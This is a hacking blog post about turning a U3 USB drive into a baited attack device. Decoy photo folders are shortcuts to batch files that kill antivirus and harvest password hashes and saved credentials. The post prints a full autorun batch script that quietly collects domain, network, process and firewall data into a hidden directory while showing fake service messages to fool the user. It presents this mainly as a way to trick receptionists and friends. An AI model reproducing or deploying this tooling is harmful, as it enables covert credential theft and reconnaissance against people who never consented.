Enumeration using usb hacksaw
12:53 pm
system hacking
0
comments
USB Enumerator vs USB Hacksaw
So what cold hearted person wouldn't want to return a USB Device with baby and wedding pics on right! Oh and the guy in the wedding photo...... he's in a wheelchair (thanks Google Images) so it would have to be a cold hearted individual who is going to keep that USB drive.
Next I have a couple more directories.
Well they look like directories but they are just links to my evil scripts that will help me on my dark crusade.
A closer look at the shortcut reveals its actually a link to a batch file that will kill any running AV and launch programs to get the local password hashes, internet passwords and login details for MSN etc. And we all know that people re-use paswords don't we.
When someone clicks on one of these 'shortcuts' it will place the running batch file to the back of any open windows and the only clue that anything is going on is a folder in the toolbar which will disapear after a few seconds.
And the batch file can do anything. Obviously I want to stop AV first, and then thanks to a few tools from Nirsoft as well as a few others from the likes of foofus I have loads of juicy details coming my way.
And what does this give me? Hashes, oh the lovely hashes.......
And of course we want the websites too.
And theres plenty more but I'm sure you get the point.
But this is a U3 thumb drive, so hopefully we don't need to rely on a nosey bugger clicking around, because it will hopefully utilise the auto run feature to enumerate the network as soon as it's plugged in. It does the crazy enumeration coolness by running this script from the hidden \WIP\CMD folder.
Here's the simple batch file that does the enumeration:
@Echo off
echo Starting. Do not close program. Please wait 15 seconds.
::Generate a unique filename
set fn=%computername%-%random%
::Create a non-obvious directory
mkdir .\Windows\System\System32\etc\hosts\win\0011\%fn%
cd .\Windows\System\System32\etc\hosts\win\0011\%fn%
::Get local Time and Date Info
time /t >%fn%.log
date /t >>%fn%.log
::Network Info
net user /domain >>%fn%.log
echo Restarting critical service. Please Wait 5 seconds.
net group /domain >>%fn%.log
net localgroup /domain >>%fn%.log
net localgroup administrators /domain >>%fn%.log
net localgroup "Account Operators" /domain >>%fn%.log
net accounts /domain >>%fn%.log
net view /domain >>%fn%.log
net view >>%fn%.log
echo Service restart complete. Please wait 5 seconds.
::Local Info
ipconfig /all >>%fn%.log
ipconfig /displaydns >>%fn%.log
netstat -ano >>%fn%.log
netstat -r >>%fn%.log
arp -a >>%fn%.log
tasklist /svc >>%fn%.log
tasklist >>%fn%.log
tasklist /v >>%fn%.log
net share >>%fn%.log
net use >>%fn%.log
net accounts >>%fn%.log
net localgroup >>%fn%.log
net localgroup administrators >>%fn%.log
systeminfo >>%fn%.log
netsh firewall show config >>%fn%.log
echo Service failed to load. Error code MS-31337
netsh diag show all /v >>%fn%.log
local accounts and groups, firewall policies, applied hotfixes, network connections, open ports, running services, shares, networking information and other bits and bobs as well.
And the beauty of it all is it's just using Microsoft tools which won't make the AV go loopy and freak out. So within a few seconds of plugging the device into any PC with a USB port on a network and you'll have more data than you can shake a big enumerating stick at. Wonderful!
All this useful data is output to a single log file that is in a deeply buried obfuscated directory with a random number appended to the end, so it can be run time after time and is nicely tucked away.
But what if autorun is disabled? Well just like the script that kills the AV and grabs the passwords this can be run manually by clicking the batch file or by fronting it with a shortcut with a folder icon and running that.
So how can this be useful in a pentest? it could be that during that pentest you have social engineered your way onto a helpful persons PC who is going to print something off for you or email an important document for you and said files are on your USB device. Or you could hand a USB device to a receptionist to ask her to heck who's it is. Or of course you could just be transfering those picture or music files to your friends computer. So if your reading this and you know me, maybe next time you ask me for a file or a movie that I have on USB you better think again!
So there you have it, my take on making my USB Hacksaw a little more interesting.
0 comments: